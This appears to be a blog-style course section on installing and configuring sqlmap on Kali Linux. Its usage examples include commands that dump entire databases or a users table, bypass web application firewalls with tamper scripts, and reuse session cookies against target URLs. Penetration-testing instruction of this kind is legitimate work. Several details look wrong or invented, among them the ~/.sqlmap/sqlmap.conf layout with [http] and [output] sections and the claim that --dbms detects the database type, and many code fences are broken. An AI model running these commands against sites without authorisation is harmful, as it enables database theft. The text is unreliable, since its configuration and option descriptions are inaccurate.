# sqlmap: The Ultimate Pentesting Course – Section 1/5: Installation & Configuration on Kali Linux
## Overview
In this section of the course, we will delve into the installation and configuration of sqlmap on Kali Linux, a powerful tool used for automated testing of SQL injection vulnerabilities. Next, we will explore how to effectively utilize sqlmap in real-world scenarios, alongside detailed explanations and examples.
## 1. Installation of sqlmap on Kali Linux
### 1.1 Prerequisites
Before we install sqlmap, ensure that your Kali Linux environment is updated and you have the necessary dependencies installed. Execute the following commands in your terminal:
"`bash
sudo apt update && sudo apt upgrade -y
"`
### 1.2 Installing sqlmap
Kali Linux typically comes with sqlmap pre-installed. To check if it's already available, run:
"`bash
sqlmap –version
"`
If sqlmap is not installed or you want to ensure you have the latest version, you can clone it from the official repository on GitHub:
"`bash
git clone https://github.com/sqlmapproject/sqlmap.git
"`
### 1.3 Navigating to sqlmap Directory
After cloning, navigate into the sqlmap directory:
"`bash
cd sqlmap
"`
### 1.4 Running sqlmap
You can run sqlmap directly from the cloned directory. Use the following command:
"`bash
python sqlmap.py
"`
If you encounter issues with Python 3, you can specify Python 2 with:
"`bash
python2 sqlmap.py
"`
**Note:** Make sure you have Python installed. You can install Python if needed by executing:
"`bash
sudo apt install python3
"`
## 2. Configuration
sqlmap does not require extensive configuration to get started, but certain configurations can enhance your experience.
### 2.1 Setting Up Proxy
For stealthy penetration testing, you might want to configure a proxy. You can set the proxy by creating a configuration file (`~/.sqlmap/sqlmap.conf`) and adding the following:
"`ini
[http]
proxy = http://127.0.0.1:8080
"`
### 2.2 User Agent Configuration
Sometimes, it's necessary to change the User-Agent string to mimic different browsers. You can add the following line to your configuration file:
"`ini
[http]
user_agent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
"`
### 2.3 Setting Output Directory
If you plan on performing extensive tests, consider directing output to a specific directory for organization. Add this to your configuration:
"`ini
[output]
output_dir = /path/to/output/
"`
## 3. Step-by-Step Usage of sqlmap
### 3.1 Basic Usage
The simplest way to use sqlmap is to target a URL that you suspect may be vulnerable to SQL injection. Here is the basic syntax:
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1"
"`
### 3.2 Verbose Mode
For detailed output, use the `-v` flag to specify verbosity levels (0-6):
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1" -v 3
"`
### 3.3 Common Options
– **Detecting the Database Type**
To identify the database type, use the `–dbms` option:
python sqlmap.py -u "http://example.com/page.php?id=1" –dbms=MySQL
"`
– **Retrieving Database Names**
To list all databases:
python sqlmap.py -u "http://example.com/page.php?id=1" –dbs
"`
### 3.4 Real-World Use Cases
#### Example 1: Extracting Data from a Vulnerable Application
Assume we have a typical vulnerable application. Here’s how you can extract user data:
"`bash
python sqlmap.py -u "http://vulnerable-website.com/user.php?id=1" –dump
"`
This command will extract all data from the tables that sqlmap discovers.
#### Example 2: Bypassing WAFs
Some web applications deploy Web Application Firewalls (WAFs). To bypass them, sqlmap allows you to modify the injection payloads. Use the `–tamper` option:
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1" –tamper=space2comment
"`
### 3.5 Advanced Techniques
– **Using Cookies**
If authentication is required, you can pass cookies as follows:
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1" –cookie="PHPSESSID=xxxxxx"
"`
– **Data Extraction with Specific Tables**
To retrieve data from a certain table, use:
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1" -T users –dump
"`
## 4. Detailed Technical Explanations
sqlmap works by exploiting SQL injection vulnerabilities to execute arbitrary SQL commands on the back-end database. Below are some critical areas to understand:
### 4.1 Understanding SQL Injection
SQL injection occurs when an attacker is able to manipulate an SQL query by injecting malicious SQL code through user inputs. It's crucial to understand this vulnerability type to better defend against it.
### 4.2 How sqlmap Operates
sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It uses a series of tests that include:
– **Boolean-based blind SQL injection**
– **Error-based SQL injection**
– **Time-based blind SQL injection**
– **Union-based SQL injection**
Each method is employed depending on the response from the server.
### 4.3 External Reference Links
– **sqlmap Official Documentation**: [sqlmap.org](https://sqlmap.org)
– **OWASP SQL Injection**: [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
– **Kali Linux Documentation**: [Kali Linux Documentation](https://www.kali.org/docs/)
—
This concludes the installation and configuration section of sqlmap on Kali Linux. In the next section, we will dive deeper into advanced usage techniques and case studies to strengthen your skills in ethical hacking using sqlmap.
nnMade by pablo rotem / פבלו רותם